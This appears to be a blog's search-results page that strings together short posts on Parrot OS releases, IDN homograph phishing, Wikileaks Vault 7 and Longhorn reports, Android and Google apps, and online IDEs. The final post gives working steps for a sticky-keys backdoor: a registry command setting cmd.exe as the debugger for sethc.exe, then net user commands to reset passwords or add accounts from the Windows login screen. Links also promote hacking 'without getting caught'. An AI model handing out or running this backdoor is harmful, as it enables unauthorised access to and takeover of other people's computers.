Search Results for: hacking

Parrot Linux OS 3.6, Parrot AIR released – Parrot OS 3.6 Lite version , Parrot OS 3.6 Studio Edition

So finally the latest version of Parrot OS i.e. Parrot 3.6 has been released for the users. FrozenBox has released the new Parrot security OS which is based on Linux 4.9 Kernel.

We have written two more article on Parrot Linux, please consider them if you are li’l new to it.

Parrot OS 3.6 – New Alternative to Kali Linux 2017.1

The new version of Parrot OS is more focused on user experience and working environment. Now low memory computers can also use the new Parrot OS 3.6.

As the new version is based on Linux kernel 4.9.13 and Debian GNU / Linux 9 Stretch. Parrot Linux 3.6 is the new alternative of Kali Linux 2017.1.

Parrot 3.6 with better less memory usage & reliable for users.

The developer team of Parrot 3.8  has mentioned the changes in their official blog. According to them, this version is not about the new features & functionalities but this version is made to make the environment more better , reliable & less memory hungry. This has been done by by applying many minor fixes to our build platforms & packages, also tuning the start-up daemons management system. As a result Parrot 3.6 lite version can be used with just 200 MB RAM.

Parrot Linux OS 3.6, Parrot AIR , Parrot OS 3.6 Lite version , Parrot OS 3.6 Studio Edition
Parrot Linux OS 3.6, Parrot AIR , Parrot OS 3.6 Lite version , Parrot OS 3.6 Studio Edition

Parrot 3.6 Anonsurf improvement

Improvement is made to Anonsurf, now the anonymity & privacy is more reliable & well tested. Now the previous versions of Anonsurf which shows some worst nightmares to the users are past stories now.

Parrot AIR
Parrot AIR

Parrot OS 3.6 Lite version & Parrot OS 3.6 Studio Edition

The developer team of Parrot OS 3.6 has also worked on the Lite & studio Editions. As Parrot Core is not just a good security oriented platform, but is also useful in general purpose derivative projects, and workstations and personal computers. It can now take advantage of light weight Debian systems.

Parrot AIR

There is also a new version of Parrot OS i.e. Parrot AIR. Parrot AIR is very similar to Parrot Full version but the only difference is that is is only AIR version is integrated with the tools that are dedicated to the wireless testing.

Parrot AIR developed for AIRBUD

It is developed for the AIRBUD board which is a powerful blend of  wireless station & x86 embedded computer. AIRBUD is developed by Alftel. Parrot AIR is a very nice choice for pen testing boards & it can be used on a PC like the Parrot x86 edition.

The Mirror Dierctor is also improved  for faster downloads & updates. There are many new universities & companies who have recently joined Parrot Servers network.

With the joint effort of these security companies, they have worked on the side projects related to loT, Automotive securities.

Parrot Support for PineBook

Soon there will be a support for the new PineBook which is a cheap laptop build on arm64 SoC of the Pine64.

Parrot Linux v3.5 has released a new update with some new toll in the newer version. This article will give you a small introduction for it.

Download Parrot Linux v3.5 –  Parrot OS review

There are many Linux distribution that are used by users , testers & hackers too. Parrot Linux is one of them widely used by all testers & hackers. This Linux distribution is a very popular OS among hackers & testers.

Now the Parrot OS has been updated with a newer & improved version. Parrot Linux v3.5 has bring some new hacking tools with it. Some of them are Cryptkeeper & Kernel. Linux kernel 4.9.13 is used in Parrot Linux v3.5 that is the newest version.

This updated version is released after two months as said by the Company officials. They have spent more time time in testing it with debian products. Some of the old features are dropped & some new features were introduced in Parrot Linux v3.5.

Parrot Linux v3.5
Parrot Linux v3.5

The official website has told that they are witing for the newer version of debian kernel so that they could work on it & improve the product. The Parrot 3.5 still supports VMWare & Virtual Box as in the previous versions.

Features of Parrot Linux v3.5

Parrot Linux is one of the popular Linux OS used by Hackers & penetration testers. The update must be better than the previous versions

Parrot OS version 3.5 features – Parrot OS Tools

  • It has out of the box printing support i.e. CUPS (Common Unix Printing System)  called drivers.
  • Cinnamon environment experiment support.
  • ZuluMount mount utility.
  • Sirikali that is used to mange folders & file with encryption.
  • Hacking tools are included again from the previous version to newer.
  • Mozilla Firefox with security fix plugins is introduced.

So if you find this article useful then please provide a comment on how it helped you. You can also like us on Facebook or Subscribe us for more Updates using your E-mail Id. Thank You.

Homograph Phishing Attacks is almost non detectable attack – IDN Homograph Attack

A Chinese researcher has found a totally new type of phishing attack. This homograph phishing attack can be used on all the Internet users even on those who are quite familiar with hacking attacks.

Homograph / PunnyCode  Phishing Attack

According to this Chinese researcher, a vulnerability of all popular web browser such as Chrome. Opera & Mozilla. A hacker can display the name of desired website to steal a website password & nobody is able to find out the phishing attack. A Hacker can display any website on the address bar like apple, Google or Amazon that will help to steal the sensitive information of a user.

Also Read :  Best Android Apps that you should install in your Phone in 2017

The best way to prevent you from phishing attack is that you check the address bar with a fake domain name. But what if the domain name is same which we tried to login.

Homograph Attack Chrome – IDN Homograph Attack Example

So if you like to see the details then you can click on this link to see the page. A heavy traffic is driven by this page as everyone is curious to see this. This webpage is developed by the Chinese researcher who shows the demo of this hacking attack.

In the official statement of Xudong Zheng in his blog. “It becomes impossible to identify the site as fraudulent without carefully inspecting the site’s URL or SSL certificate.”

Best VPN

So basically if you browser shows apple.com in the address bar & the content in the webpage is differnet than you browser is vulnerable to homograph attack.

The same demonstration is given by Wordfence where the domain shows epic.com & the contents of the webpage are different. Click here to see this.

homograph phishing attack
homograph phishing attack

History & working of Homograph Phishing attack

The concept of homograph attack emerges in 2001 when the using the Unicode characters replacing with characters. This shows the same legit url in the address bar but the domain is totally different which is asking for your login or sensitive data details.

Best VPN

Many uni-code characters which represent Greek, Cyrillic, and Armenian alphabet in international domain looks same in Latin words by people but are different in the sense of machines.

For example, Cyrillic “а” (U+0430) and Latin “a” (U+0041) both are different in machine level but the display ‘a’ same in every browser.

Browser use Punnycode to represent unicode characters & can defend from the homograph phishing attack. Punnycode is used to convert unicode to ASCII code supported by International Domain Names (IDNs) system.

Zheng said that the domain name is displayed correctly if all the unicodes are taken from same language.  But tends to display wrong url if multiple language unicodes are used.

As a result if you register a domain name as xn--80ak6aa92e.com & bypass the unicodes then the domain displayed will be apple.com by all the browsers vulnerable to this.

Zheng has reported this issue to all the leading browser to fix the issue.

Prevention from Homograph Phishing attack

For a Firefox user , follow these steps to do prevent you from the attack.

  1. Type about:config in address bar and press enter.
  2. Type Punycode in the search bar.
  3. Parameters in a browser setting will show network.IDN_show_punycode,
  4. Select & click the option to False.

Unluckily there is no option for Chrome & Opera users, you guys have to wait for the next updated version. So you can use some plugins to stay away from it.

You are advised to use a good password manager to stay safe from such homograph attack. So if a website which shows apple.com or amazon.com but your password manager is not responding then you know that the homograph attack is in progress & you can go back from there.

Also Read : Google Hire – A new Service for Job seekers & competition to Linkedin

If you like the information or have anything to add please write a comment below & tell us. If you like the information please like our Facebook Page or Subscribe us for our Daily Updates in your Inbox. Thank You.

Wikileaks new report in the series of Vault 7 : CIA Virus Control System “Hive”

The eye opener Wikileaks vault 7 has issued six documents that reveals some information about the Hive. Hive is a back-end software that is hidden as an HTTP in plain site. It is used to send information to implants while some commands are given to implants to execute them.

Wikileaks Vault 7 – CIA Virus Control System Hive

This Friday means on 14 April , Wikileaks have shown some more documents for vault 7. CIA must be very angry of Wikileaks. This can be seen from the CIA director’s speech. This time it is about the CIA project Hive.

This month many things about CIA are revealed by Wikileaks. You can read them from below.

Hive is a back end application which is made by CIA for keeping any eye on any of their leads. This application is made by CIA so that they can get the information from any target to the agents. These agents can also execute the commands in your PC & control the PC as they like.

Hive works on HTTPS Interface

The best feature of this app is that it works on HTTPS interface, which can cross any suspicious scan. There is almost no feature that can detect its presence.

According to these documents Hive has two basic functions i.e. “beacon” and “interactive shell”. Basically it works in two modes full featured mode & limited featured mode.

Wikileaks vault 7
Wikileaks vault 7

Hive works in various platforms like Windows, Linux & Solaris, Mikrotik, etc. These documents also give us a small clue that Researchers of Symantec have told us. During the research Symantec researchers have told that they have found a resemblance in the 40 cyber attacks made by LongHorn.

This all concludes that CIA is not working just with its own. Many other hacker group is also working with same intention as an ancillary unit for CIA. The researchers at Symantec has already told their results & mentioned it in a blog post.

This whole thing is happening from a month ago. In the series of these documents there will be more things to come out. If you have anything to add, then please write a comment in the comment box.

 

If you like the information please like our Facebook Page or Subscribe us for our Daily Updates in your Inbox. Thank You.

Best Android Apps that you should install in your Phone in 2017

Web Design & Development

This article will provide you the names of best android apps that are helpful for you in daily life. I have written another article on Android apps but all those were hacking apps. If you have interest in hacking then you can read it & install those apps in you device.

Best Android Apps that you should install in your Phone in 2017

So here I am talking about some best android apps that are useful for any android user.Android platform is not just a phone OS but has emerged in every field. Now you can do almost everything from your phone. There is an app for every task for your phone.

Most of us uses our phone as calculator, memo , diary & many tasks. Here I am going to tell you the name of some apps that can extend the functions of your phone.

Valet

This app is used to park you car. May be this found foolish to you, it can help you when you are parking your car in a very large area. It also helps you to locate your car if you forget its place. Th Bluetooth will provide you the directions to get your car’s location. It can also set alarms for you if you can’t find it. The app can remember the hotel & the resort where you parked it.

Also Read : Facebook Users are getting friend request from thier friends who died a time before

Smart Tools

Smart tools is a paid app that helps you in measuring tasks. It has a set of virtual tools that can measure  light, vibration, sound, distance, length etc.

The app does not need any Internet connection to work. Only Maps & currency exchange is where the internet is must. The app is working in almost every device.

Best Android Apps that you should install in your Phone in 2017
Best Android Apps that you should install in your Phone in 2017

ColorNote

As the name suggest , this app is used to keep notes & memos. An E-mail,messages or anything else can be kept as a note in this. These notes can be kept in different colors. You can store these notes in you device as well as cloud. The notes can be protected with password if needed. The cloud storage is easily accessible from any pother device.

A beautiful feature of this app is that you can put the notes as a widget in your phone. This app can be a good alternative to diaries & to-do lists.

CamScanner

Using this app you can scan any document on whiteboard text & share it with anyone. The files will be in JPEG or PDF format. The sharing can be done in social media or email. The enhancement feature of the app will make text more clear & better. You can add annotations in your scans.

ConvertPad

A simple unit converter app that is able to converts the unit from one to another. It supports 160+ currencies & 25 languages. If you have a small or large business, then for conversion this app is very useful to you. ConvertPad does all the conversions in real time which makes it more efficient for use.

Google Translate

This app needs no introduction. Everyone know s it can translate languages. Through some additional features are , you can use the camera to read the text & the output language will be shown in the display. More than 100 languages are translated in this app. You can also download a language package if you don’t have an Internet access in a particular area.

Key Ring

KeyRing lets you store coupons, rewards, shopping vouchers, loyalty & club membership cards in your phone. You can save the bar codes & coupon no in you phone.

Also Read : Google Launches a new app named Areo for food & home services for Indians

So here’s are some of the best android apps in 2017.You can install them from the links given. If you like the information please like our Facebook Page or Subscribe us for our Daily Updates in your Inbox. Thank You.

Google Launches a new app named Areo for food & home services for Indians

Every Tech giant is coming forward in getting the market from India. In this List Google is also included, Google is providing many services to Indians that can attract us. In this Google took a step forward , an app is launched called Google Areo.

Google Areo – For Food Delivery & Home services

Google Areo is a new app designed by Google. This Android application will show all the food places, restaurants & many home services like laundry, Beauty Salon etc. Many applications have provided these type of services. But in the case of Google , it has taken this to a new level. In a few weeks the services like mechanic, personal driver and web development will also be displayed in the app.

Areo is made upon seeking Indian mindset, where you can use any payment method. The payment method are like Online transfer, debit & credit cards , Cash on delivery. The Government of India is encouraging Indians for digital payment. Google has not included any type of digital payment for it like PayTM, Freecharge or any other.

Also Read : Facebook Users are getting friend request from thier friends who died a time before

There may be inclusion of Google payment method soon. The app is started in Mumbai & Bangalore. Soon the app will be available for use in other cities of India. Through you can download the app & use it , but very less locations will be seen to you.

Google Areo
Google Areo

Apps Especially for Indians

Areo will show you the locations in the form of special cards. As you will click on the card , app will show you the details of the location. These card are available in different colors. Every color defines a type of location like restaurant or salon. These card will be shown to you as per your current location.

Teach giant is showing huge interest in the Indian economy. Google CEO said , India will soon become a trillion dollar economy in upcoming three to four years.

Not only this app many other apps have been developed by Google especially for Indians. Apps like  YouTube Go Beta app is the first app that is specially designed for Indians living in slow internet areas. For music streaming Google has provided a low budget music subscription of 89 rupees per month.

Google has also collaborated with government for student training, secure digital payments, grant digital skills for artisans.

In this campaign Facebook has also shown interest for many real life applications. Facebook has developed a platform for artist, photographers & many other professionals that provide more exposure to the professionals.

Also Read : 15 Free Hacking Apps for Android Users in 2017

So here’s the detail of Areo. If you like the information please like our Facebook Page or Subscribe us for our Daily Updates in your Inbox. Thank You.

How to Make a Tiny Linux PC in a Mouse

A YouTuber named Slider2732 has shown a video on how he created a tiny PC using an optical mouse & Orange Pi. This home-made PC works on Linux. He has shared the video on his YouTube channel on make Tiny PC using Mouse.

Make Tiny PC using Mouse

Many of us who don’t like to throw away the computer accessories must read this. If you have an old mouse left with you then you can use this way to make a small PC from it. Yes using the method suggested by Slider2732 you can make Linux PC from it.

Also Read : Most Popular Hacking Tools in Kali Linux

To make a PC in a mouse Slider2732 used an old Logitech Mouse with a transparent bottom. The transparent bottom is used to see the components inside mouse.

Make Tiny PC using Mouse
Make Tiny PC using Mouse

Slider2732  has also created a wireless network that enables his creation to use Internet & watch videos on Internet.

His Mouse PC runs on RetroOrangePi 3.0.1 Linux. It has Armbian 5.25 O/S, OpenElec, Kodi and all the games system & arcade emulators. Debian 8-based Armbian can also be used. You can get a Orange Pi by visiting a link.

You can also watch this video for more information.

Also Read : What is the best way to backup your Smartphone data -Android phone or iPhone

Like us on Facebook or subscribe us for more updates like these in your inbox. Feel free to ask anything in the comment box. Thank You.

Researchers have found close resemblance 40 Cyber Attacks & Wikileaks Documents

Researchers has announced a study made by them on 40 cyber attacks conducted by LongHorn. The patterns of tools & techniques that were used by the hacker have very close resemblance that are described n Vault 7.

Wikileaks Vault 7 Resemblance in 40 cyber attacks

During this month a very hot topic is raised by Wikileaks. The document released in public by Wikileaks are named as Vault 7. After a team of researchers have studied these documents & they also have a quite interesting story about the tools in cyber attacks.

Also Read : Most Popular Hacking Tools in Kali Linux

Researchers at LongHorn have concluded & relate 40 cyber attacks that were made in 16 countries. According to the these attacks were conducted by a cyber group called LongHorn. They also said that the details in the document of Vault 7 & LongHorn have a very high resemblance. many technical specifications are matched totally.

40 cyber attacks
40 cyber attacks

Conclusion by Symantec Researchers

LongHorn is using Trojans and 0-day bugs attacks to many government firms , telecoms & IT firms since 2010.

After all these conclusion Symantec researchers said in a blog post that Vault 7 activities & LongHorn activities are done by a some group & are somehow related to each other.

Vault 7 has described a tool called FluxWire which is developed on the base of Trojan. Another tool callen Corentry also belongs to LongHorn.

As many features of Corentry and the sample that is shown in Vault 7 document are apparently similar.

Another tool called archangel has a quite similar interface with LongHorn Tool called plexor backdoor.

The cryptographic methods of Vault 7 & Longhorn are also same. This includes AES & 32 bit key one key per connection. This practice prevents from MITM attacks.

LongHorn was first detected in 2014 by Symantec when they were using 0-day exploit to infect the host with plexor. After they analyze the attack , they knew that the attackers have good knowledge about the victim. The tools used in the attacks were Corentry, Plexor, Backdoor.Trojan.LH1, and Backdoor.Trojan.LH2.

Before the Vault 7 documents were released, Symantec have assumed the attakers as an informtion gathering group. But after the documents are released , the official statement of Symantec have chnaged & the link has gone through CIA.

They added “Taken in combination, the tools, techniques, and procedures employed by Longhorn are distinctive and unique to this group, leaving little doubt about its link to Vault 7.”

Also Read : What is the best way to backup your Smartphone data -Android phone or iPhone

That’s it for now. If you like Google Gboard Tips & tricks, please write a comment for us to let us know. Like us on Facebook or subscribe us to get all the daily updates from us. Thank You.

Google launched a new Fake News Checking Tool for Google News & Search

Google has launched a tool which will check the facts of the news shown in the Google search & news. Soon Google news checking tool will show a snippet in every news or search about the authenticity of a news item.

How to use Google Fact Check – Google news checking tool

Soon we will see a snippet in the search bar of Google. If you will search any news or fact on Google, then it will show you some information about its authenticity. Google has announced this feature as a fact checker tool.

Few days back, Facebook has also announced about this. Facebook may be launching this tool in sometime but Google has announced it now. Google has so many information contained in it that it must be having a mechanism to check the truth behind this.

Also Read : Microsoft revealed the type of data that it is collecting from your PC

The fact checking task is not being done by Google. This task will be performed by PolitiFact and Snopes. For example if someone searches a fact , then search results will also include a snippet. The snippet will show the details about who says that & who verified it.

How to turn on Google Fact Check Feature

This tool was tested by Google in last October in some countries. The test was conducted on Google News. Now talking about how it works.

Google news checking tool
Google news checking tool

This snippet will not be available on every search. According to Google, a singe publisher can have two conclusion for a same fact. But still those two facts will be helpful for the searching person to take a right decision based on fact.

Those publishers who want to get included in the program have to put some cods in their websites. Then the published facts will be shown to them.

With this fact checking tool of Google. Many IT companies will be able to cop up with fake information. Now Google has become a company who took a step forward in fighting with irrelevant content around the Internet.

Facebook has also introduced the concept which is quite similar to this. In the Facebook world, as a person will update a news fact in the status & some News network will provide a claim on the authenticity on the facts. If user still wants to post it then the status & the claim will be posted together.

Algorithm used in Google news checking tool

Google has taken the help from algorithms which select some publishers which are considers authentic. These algorithm will be deploying Schema.org ClaimReview markup on the web pages where the facts will be checked. Other possibility is that Share the Facts widget can also be used developed by joint efforts of Jigsaw and the Duke University Reports Lab.

Also Read : Tips to stay safe while hacking something

If you find the article useful please write a comment for us to let us know. Like us on Facebook or Subscribe us to get the daily updates in your Mail box. Thank You.

Some Websites where you can code & compile your Programs – What is Online IDE & some popular Online IDE

Many compilers are used in computer which are memory & processing intense. This also happens when we play games that takes high size in memory.The same concept works for online IDE too.

What is an Online IDE – Websites where you can code & compile your Programs Online

Many of us do not have a high performance computers with us. Those people can use these online IDE that will let you work on any language & learn programming.

Now in the case of compilers, there are many websites that facilitate the programmers to write, debug & run programs online. These programming facility is called online IDE. Some of these names are written here for you.

Also Read :  Reset Windows Admin password using this Backdoor technique in 2017

Some Popular Online IDE

Online IDE
Online IDE

IDEOne

IDEOne is an online IDE that let you do all the programming chores in the single window. It supports more than 60 programming languages. Some of these languages are C, C++, C#, Objective C, Java, Pascal, Perl, PHP, Ada, COBOL, FORTRAN.

CodePad

This website in an online compiler or interpreter tool. You can also share your code with this. After you run your code successfully or maybe not, you will get a link to share the code. You can share the code to get some help with your friends or instruct someone to know how to code. The website also works in mobile phones.

Compile-Online

With this you can compile every programming language that you know.

JDoodle

This online compiler is used to compile Java, C, C++, Perl, PHP, Python programs.

HackerEarth

This online IDE is a online compiler that lets you code in almost every language just like IDEOne. The features in this IDE is almost same as in other IDE.

CodeChef

This is non commercial programming community that provide you an IDE to work with any language with your device & an active connection.

These online websites are quite helpful for anyone who codes. The best use of these sites are you do not need to install any compiler . You just need a PC or a mobile phone with an active internet connection.

Also Read : How to hack anything & not getting caught – Tips to stay safe while hacking something

If you know any IDE other than these, please write us in the comment box. Your feedback is essential to improve & excel.

Like our Facebook Page or subscribe us to get all the updates directly to you. Thank You.

Reset Windows Admin password using this Backdoor technique in 2017

If someone gets a physical access to a windows computer then there are many things by which someone can get the access of a password protected PC. This article will tell you how to reset windows admin password.

Reset Windows Admin password

There is no single method of gaining access for it. One of the most common method is to use Kon-Boot which provides access to a Windows PC with password. This is done by using a CD or USB boot.

If BIOS is secured with password, then the boot order can’t be altered. Some how if you remove the jumper & CMOS battery from the computer than this can be done. This reset the BIOS & let you change the boot sequence. So if you know how to change the boot sequence , the password can be breached.

Also Read : How to prevent your smartphone from being hacked by anyone

Here I am learned a new way that can gain access to a computer without knowing the password. You can also add a new user with this trick. This method is not like the old one which required a software to install. This technique is based on making a backdoor that can let you do this by command prompt. And the command prompt can be accessed directly from the Windows login screen.The command prompt will let you do all the admin level tasks in the PC.

Reset Windows Admin password
Reset Windows Admin password

Steps to Reset Windows Admin password

You can do this simply by following these steps

  1. First of all you need to login as admin in the PC. Now type cmd in the search window & right click on the command prompt. Click on run as Administrator.
  2. As the window will be opened. Copy & paste the given command in the command window & press enter.REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”
  3. Now the output message will be “The operation completed successfully”. This means our backdoor is installed. If your message do not comes like this then you should log in through admin access.
  4. Now restart the PC & login screen will come. Press shift 5 times or press Alt+Shift+PrintScreen. A command prompt will open with admin privilege.
  5. With this window you can change the existing password or add a new user in the PC.
  6. Net user user_name new_password :- command to change the existing password without knowing the current password.
  7. Net user user_name password /add :- command to add a new user in the PC.

Technically speaking this is not a vulnerability in windows. If it was then it would have been blocked by Microsoft. After doing this you can uninstall the backdoor. The command for this is written below.

REG DELETE “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe”

This is a simple method that shows how a backdoor works.

Also Read : How to shutdown your PC using a Pen Drive

If you find this useful for you, then please write a comment to let is know. Like us on Facebook or Subscribe us to get the latest updates from our website. Thank You.